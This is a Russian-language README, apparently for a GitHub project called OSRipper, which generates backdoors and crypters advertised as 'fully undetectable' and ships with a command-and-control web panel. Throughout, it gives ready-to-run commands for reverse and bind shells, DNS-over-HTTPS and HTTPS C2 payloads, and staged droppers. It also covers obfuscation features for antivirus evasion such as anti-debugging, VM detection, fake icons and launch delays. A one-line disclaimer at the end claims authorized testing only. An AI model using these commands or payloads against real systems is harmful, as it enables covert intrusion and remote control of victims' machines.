
Кроссплатформенный фреймворк для создания бэкдоров и криптеров с обходом антивирусов и интегрированным легковесным веб-интерфейсом.

Продвинутый кроссплатформенный генератор полезных нагрузок и криптер с возможностями FUD
Возможности • Быстрый старт • Веб-интерфейс • Типы полезных нагрузок • Документация
OSRipper — это сложный, полностью необнаруживаемый (FUD) генератор бэкдоров и криптер, предназначенный для авторизованного тестирования на проникновение и операций «красных команд». Он использует передовые методы уклонения, несколько типов полезных нагрузок и современный веб-интерфейс C2 для управления скомпрометированными системами.
| Тип нагрузки | Описание | Сценарий использования |
|---|---|---|
| Bind Shell | Открывает порт на машине жертвы | Прямой доступ, когда обратные соединения заблокированы |
| Reverse TCP Meterpreter | Зашифрованное обратное соединение через SSL/TLS | Стандартное тестирование на проникновение |
| DNS-over-HTTPS C2 | Скрытый канал C2 через протокол DoH | Обход сетевых ограничений |
| HTTPS C2 | HTTPS C2 с привязкой сертификата | Защищённый, аутентифицированный канал C2 |
| Staged Payload | Многоэтапная доставка через веб | Повышенная скрытность развёртывания |
| Custom Code Crypter | Запутывание любого скрипта Python | Шифрование пользовательских нагрузок |
# Клонирование репозитория
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Установка зависимостей
pip3 install -r requirements.txt
# Установка пакета
pip3 install -e .
Важно — запустите настройку для дополнительных функций (ngrok, компиляция):
Во многих системах (особенно Linux с внешне управляемым окружением Python) необходимо выполнить встроенную настройку, чтобы дополнительные зависимости были установлены в собственное виртуальное окружение OSRipper. Сделайте это один раз после установки:
osripper-cli setup
Это создаст ~/.local/share/osripper/venv, установит туда pyngrok, nuitka и sandboxed, и все последующие запуски osripper / osripper-cli будут использовать их автоматически. Без этого опции --ngrok и --compile будут запрашивать выполнение настройки. Используйте osripper-cli setup --system только если предпочитаете установку через системный/пользовательский pip вместо venv.
Интерактивный режим:
osripper
# или
python3 -m osripper
Командная строка:
# Генерация обратной оболочки
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# Генерация DoH C2 нагрузки
osripper-cli doh -d example.com --obfuscate --compile
Веб-интерфейс:
# Запуск C2 сервера с веб-интерфейсом
python -m osripper.c2.server example.com --port 5000
# Доступ к панели по адресу http://localhost:5000
OSRipper включает современный веб-интерфейс C2 для управления скомпрометированными системами.
# Базовое использование
python -m osripper.c2.server example.com
# С HTTPS
python -m osripper.c2.server example.com --https
# Пользовательский порт
python -m osripper.c2.server example.com --port 8080
# С пользовательским сертификатом
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
После запуска сервера панель управления доступна по адресам:
http://localhost:5000https://localhost:5000 (если включено)Открывает порт на машине жертвы и ожидает подключения.
osripper-cli bind -p 4444 --obfuscate --compile
Подключение:
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
Зашифрованное обратное соединение через SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
Скрытый канал C2 через протокол DNS-over-HTTPS. Обходит многие сетевые ограничения.
# Генерация нагрузки
osripper-cli doh -d example.com --obfuscate --compile
# Запуск C2 сервера
python -m osripper.c2.server example.com
Возможности:
Безопасный HTTPS C2 с привязкой сертификата для аутентификации.
# Генерация нагрузки (через веб-интерфейс или CLI)
# Запуск C2 сервера с HTTPS
python -m osripper.c2.server example.com --https
# Получить отпечаток сертификата
curl http://localhost:5000/api/cert-fingerprint
Возможности:
Многоэтапная доставка через веб для повышенной скрытности.
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate
Запутывание и шифрование любого скрипта Python.
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile
| Опция | Описание |
|---|---|
--obfuscate | Включить многоуровневое запутывание |
--enhanced | Расширенное запутывание (антиотладка, обнаружение VM) |
--compile | Скомпилировать в отдельный бинарник |
--icon PATH | Пользовательская иконка для скомпилированного бинарника |
--delay | Добавить случайную задержку запуска (5-15 секунд) |
--output, -o NAME | Имя выходного файла |
--quiet, -q | Тихий режим (минимальный вывод) |
# Полнофункциональная обратная оболочка
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--obfuscate --enhanced --compile --icon app.ico --delay
# DoH C2 со всеми функциями
osripper-cli doh -d example.com \
--obfuscate --enhanced --compile --delay
# Шифрование пользовательского скрипта
osripper-cli custom --script malware.py \
--obfuscate --enhanced --compile
# Использование ngrok для динамического IP
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

┌─────────────────┐
│ Сгенериро- │
│ ванный │
│ бинарник │
└─────────────────┘
│
│ Запуск
▼
┌──────────────────┐
│ Запутывание │
│ Дроппер │
└──────────────────┘
│
│ HTTP/HTTPS/DoH
▼
┌─────────────────┐
│ │
│ C2 СЕРВЕР │
│ (Веб-UI) │
│ │
└─────────────────┘
│
│ Команда/Ответ
▼
┌─────────────────┐
│ Агент │
│ Выполнение │
└─────────────────┘

# Генерация нагрузки с ngrok
osripper-cli reverse --ngrok -p 4444
# Следуйте инструкциям для настройки туннеля
# Запуск: ngrok tcp 4444
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--compile --icon /path/to/icon.ico
Стандартное запутывание:
Расширенное запутывание:
# Стандартное
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
# Расширенное
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced
# 1. Запуск C2 сервера с HTTPS
python -m osripper.c2.server example.com --https
# 2. Получить отпечаток сертификата
curl http://localhost:5000/api/cert-fingerprint
# 3. Сгенерировать нагрузку с отпечатком (через веб-интерфейс)
# Или использовать отпечаток при генерации нагрузки
Мы приветствуем вклад от сообщества исследователей безопасности!
git checkout -b feature/amazing-feature)git commit -m 'Add amazing feature')git push origin feature/amazing-feature)Особая благодарность сообществу исследователей безопасности и этим проектам:
ВАЖНО: Этот инструмент разработан только для образовательных целей и авторизованного тестирования на проникновение.
Разработчики не несут ответственности за неправомерное использование этого программного обеспечения. Пользователи обязаны соблюдать все применимые законы и нормативные акты.